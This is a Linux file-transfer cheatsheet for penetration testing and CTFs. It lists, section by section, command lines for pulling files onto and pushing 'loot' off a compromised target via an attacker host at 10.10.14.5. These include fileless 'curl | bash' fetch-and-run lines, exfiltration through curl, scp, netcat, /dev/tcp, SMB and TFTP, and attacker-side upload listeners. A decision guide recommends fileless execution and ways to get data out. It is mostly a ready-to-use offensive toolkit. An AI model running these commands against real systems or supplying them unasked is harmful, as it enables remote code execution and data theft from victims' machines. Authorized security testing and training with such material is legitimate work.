Linux File Transfer Cheatsheet

Default Ports: HTTP 80/tcp · SSH/SCP 22/tcp · FTP 21/tcp · SMB 445/tcp · TFTP 69/udp

“Download” = pulling a file onto the Linux target. “Upload” = exfiltrating off it. For authorized testing, CTFs, and lab use only.

wget / curl — Download

wget http://10.10.14.5/file -O /tmp/file
wget -q http://10.10.14.5/file -O /tmp/file       # quiet
curl http://10.10.14.5/file -o /tmp/file
curl -s http://10.10.14.5/file -o /tmp/file        # silent

# Ignore TLS cert errors
wget --no-check-certificate https://10.10.14.5/file -O /tmp/file
curl -k https://10.10.14.5/file -o /tmp/file

# Fileless — pipe straight into a shell (verify before doing this)
curl -s http://10.10.14.5/s.sh | bash
wget -qO- http://10.10.14.5/s.sh | bash

wget / curl — Upload (Exfil)

# POST a file to an upload-capable listener
curl -X POST -F 'file=@/tmp/loot.tar' http://10.10.14.5/upload
curl -T /tmp/loot.tar http://10.10.14.5/loot.tar        # PUT
wget --post-file=/tmp/loot.tar http://10.10.14.5/upload

Attacker-side upload server:

pip install uploadserver
python3 -m uploadserver 80

SCP / SSH

scp [email protected]:/tmp/file /tmp/file          # download from attacker
scp /tmp/loot.tar [email protected]:/tmp/          # upload to attacker
scp -r [email protected]:/tmp/dir /tmp/            # recursive

# Stream over SSH without scp (no write to target disk path needed)
ssh [email protected] "cat /tmp/file" > /tmp/file
cat /tmp/loot.tar | ssh [email protected] "cat > /tmp/loot.tar"

Netcat / ncat

# --- Receiver listens, sender pushes ---
# Attacker (receive):
nc -lvnp 4444 > file

# Target (send):
nc -w 3 10.10.14.5 4444 < file

# --- Other direction: attacker serves, target pulls ---
# Attacker (send):
nc -lvnp 4444 < file

# Target (receive):
nc 10.10.14.5 4444 > file

OpenBSD nc has no -p with -l; use nc -lvn 4444. With ncat add --ssl for encrypted transfer.

/dev/tcp (no nc, no curl, no wget)

Pure bash — works when binaries are stripped:

# Download
exec 3<>/dev/tcp/10.10.14.5/80
echo -e "GET /file HTTP/1.0\r\nHost: 10.10.14.5\r\n\r" >&3
cat <&3 > /tmp/file
# (strip HTTP headers above the blank line afterward)

# Quick one-liner
cat < /dev/tcp/10.10.14.5/4444 > file      # paired with: nc -lvnp 4444 < file

SMB

Attacker — Impacket share:

impacket-smbserver share $(pwd) -smb2support
impacket-smbserver share $(pwd) -smb2support -user u -password p

Linux target (needs smbclient / cifs):

smbclient //10.10.14.5/share -U u%p -c 'get file.exe /tmp/file.exe'
smbclient //10.10.14.5/share -N -c 'put /tmp/loot.tar loot.tar'   # anon upload

# Or mount it
mount -t cifs //10.10.14.5/share /mnt -o username=u,password=p

FTP / TFTP

# FTP (attacker: python3 -m pyftpdlib -p 21 -w)
ftp -n 10.10.14.5 <<EOF
user anonymous pass
binary
get file
bye
EOF

# TFTP (attacker: atftpd / dnsmasq tftp)
tftp 10.10.14.5 -c get file
tftp 10.10.14.5 -c put loot.tar

Language One-Liners

# Python
python3 -c 'import urllib.request;urllib.request.urlretrieve("http://10.10.14.5/file","/tmp/file")'
python2 -c 'import urllib;urllib.urlretrieve("http://10.10.14.5/file","/tmp/file")'

# PHP
php -r '$f=file_get_contents("http://10.10.14.5/file");file_put_contents("/tmp/file",$f);'

# Ruby
ruby -e 'require "open-uri";File.write("/tmp/file",URI.open("http://10.10.14.5/file").read)'

# Perl
perl -e 'use LWP::Simple;getstore("http://10.10.14.5/file","/tmp/file");'

Encode / Decode (no network channel)

When you only have a shell, paste base64:

# Attacker:
base64 -w0 file            # copy the output

# Target:
echo -n 'BASE64STRING' | base64 -d > /tmp/file
chmod +x /tmp/file

# Exfil the other way (small files)
base64 -w0 /tmp/loot.txt   # copy from target -> decode on attacker

xxd/od work the same way if base64 is unavailable.

Quick Decision Guide

Situation	Best option
Normal host, outbound 80 open	`wget` / `curl`
Fileless execution	`curl -s URL \| bash`
No wget/curl, have bash	`/dev/tcp`
No HTTP tooling, have nc	netcat transfer
Have SSH creds	`scp` or SSH stream
Interpreter present, no curl	Python/PHP/Perl one-liner
No network egress at all	base64 paste + `base64 -d`
Exfil data out	`uploadserver` + POST, or base64 paste-back

Attacker-Side Listeners (quick reference)

python3 -m http.server 80                 # serve files (download only)
python3 -m uploadserver 80                # serve + accept uploads
impacket-smbserver share $(pwd) -smb2support
python3 -m pyftpdlib -p 21 -w             # FTP with write
nc -lvnp 4444 > incoming                  # raw netcat receiver

Linux File Transfer Cheatsheet#

wget / curl — Download#

wget / curl — Upload (Exfil)#

SCP / SSH#

Netcat / ncat#

/dev/tcp (no nc, no curl, no wget)#

SMB#

FTP / TFTP#

Language One-Liners#

Encode / Decode (no network channel)#

Quick Decision Guide#

Attacker-Side Listeners (quick reference)#